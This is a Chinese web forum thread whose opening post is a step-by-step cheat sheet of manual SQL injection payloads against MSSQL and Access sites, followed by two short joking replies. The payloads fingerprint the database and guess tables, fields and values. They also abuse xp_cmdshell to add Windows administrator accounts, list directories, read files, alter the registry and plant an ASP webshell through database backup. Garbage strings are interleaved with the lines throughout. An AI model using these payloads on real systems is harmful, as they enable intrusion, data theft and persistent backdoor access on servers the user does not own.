社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4026阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2  6h N~<  
  2.初步判断是否是mssql ;and user>0 d:0RDK-}s  
n4%|F'ma  
  3.注入参数是字符'and [查询条件] and ''=' cL&V2I5O  
/"?y @;Y~  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' p.q :vI$J  
B&0^3iKFi  
  5.判断数据库系统 { p {a0*$5  
c,KT1me  
  ;and (select count(*) from sysobjects)>0 mssql L0SeG:  
lTPo2-j/eK  
  ;and (select count(*) from msysobjects)>0 access PY: l  
@EzSosmF  
<ns[( Q  
krZ J"`  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 m~~_iz_*  
1TfK"\  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ]]$s"F<  
fGJPZe  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ]{V q;  
{*H&NI  
  9.(1)猜字段的ascii值(access) I#Ay)+D  
l?~SH[V  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 o)'T#uK  
xA]CtB*o7  
  (2)猜字段的ascii值(mssql)  (7x5  
I,vy__ sZ  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 <3z]d?u  
nnIBN4  
  10.测试权限结构(mssql) s S8Z5k;  
Nh~ Hh(   
8qn1? Lb  
H r?G_L  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- O^hWG ~o  
[o<R#f`  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- X>2_G ol!  
aM?Xi6 U5  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- VYkOJAEBg  
j[gX"PdQ  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,Cj1S7GFR  
_)Q) tOW  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 31 4PcSc  
0/S|P1!b  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- }N(-e$88  
V0z.w:-  
  ;and 1=(select IS_MEMBER('db_owner'));-- oEU %"  
EP&iG%(k  
!Sfy'v.  
\-N 4G1  
  11.添加mssql和系统的帐户 FGu:8`c9  
+4f>njARIb  
  ;exec master.dbo.sp_addlogin username;-- br+{23&1R#  
  ;exec master.dbo.sp_password null,username,password;-- P0S ;aE  
mf6?8!O}>  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Ji4c8*&Jpc  
X|t?{.p  
  ;exec master.dbo.xp_cmdshell 'net user username password 6Lz{/l8  
[c]X) @#S  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ~"!F&  
g<{/mxv/  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- +Sv`23G@  
:.f =>s]  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^;n,C+  
Lg pj<H[  
Bu">)AnN  
~Y@(  
  12.(1)遍历目录 YuSe~~F)j  
]78I  
  ;create table dirs(paths varchar(100), id int) {^>m3  
%h 6?/  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' rBa <s  
]=of=T:  
  ;and (select top 1 paths from dirs)>0 }"wWSPD  
_C~e(/=z  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) %ribxgmd  
a{^[<  
0vNEl3f'O  
Q]Q i  
  (2)遍历目录 4_3Jpz*  
'x{g P?.  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- R<{bb'  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 C%t~?jEK~^  
st P~/}  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 &0SX*KyI  
^ '!]|^  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 !}|n3wQ  
)a.Y$![  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 _HX 1E  
oh:q:St  
=($RT  
u$$@Hw  
  13.mssql中的存储过程 nx`!BNL'V  
:TJv<NZi'  
  xp_regenumvalues 注册表根键, 子键 6js94ko[  
V|KYkEl r1  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 -;&aU;k  
eU 'DQp*  
  xp_regread 根键,子键,键值名 ewg&DBbN"  
7YsBwo  
  ;exec xp_regread 1OK,r`   
ce th)Xm  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 {j@ S<PD  
|F[E h ~  
  xp_regwrite 根键,子键, 值名, 值类型, 值 |>@Gbgw^M  
IJ2]2FI  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 -jnx0{/  
Q*}#?g  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !cPiH6eO  
] C_g: |q  
  xp_regdeletevalue 根键,子键,值名 ?F]Yebp^  
:L#t?~  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 H$TYp  
R+k-mbvnt  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 yPrp:%PS  
'b#RfF,7H}  
5('_7l  
HKr")K%  
  14.mssql的backup创建webshell .WM0x{t/  
CAyV#7[0  
  use model 7sKN`  
J.Mj76\_  
  create table cmd(str image); YY-{&+,  
@Aa$k:_  
  insert into cmd(str) values (''); 0jCYOl  
tz0@csXV  
  backup database model to disk='c:\l.asp'; {Ts@#V=:  
dd1m~Gm  
@/h_v#W  
CqX2R:#  
  15.mssql内置函数 ` W$  
csE 9Ns  
  ;and (select @@version)>0 获得Windows的版本号 4GWt.+{J$  
#PUvrA2Zl  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa }&#R-eQT  
1~:7W  
  ;and (select user_name())>0 爆当前系统的连接用户 "&?F 6Pi  
Qj: D=j8  
  ;and (select db_name())>0 得到当前连接的数据库 2?YN8 n9n  
2|]$hjs  
S|!)_RL  
m^cr-'  
  16.简洁的webshell =H6"\`W  
{a`t1oX(  
  use model x*td nor&  
'Lu7cb^  
  create table cmd(str image); P5s'cPX  
nIdB,  
  insert into cmd(str) values (''); gTWl];xja  
P#-9{T   
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五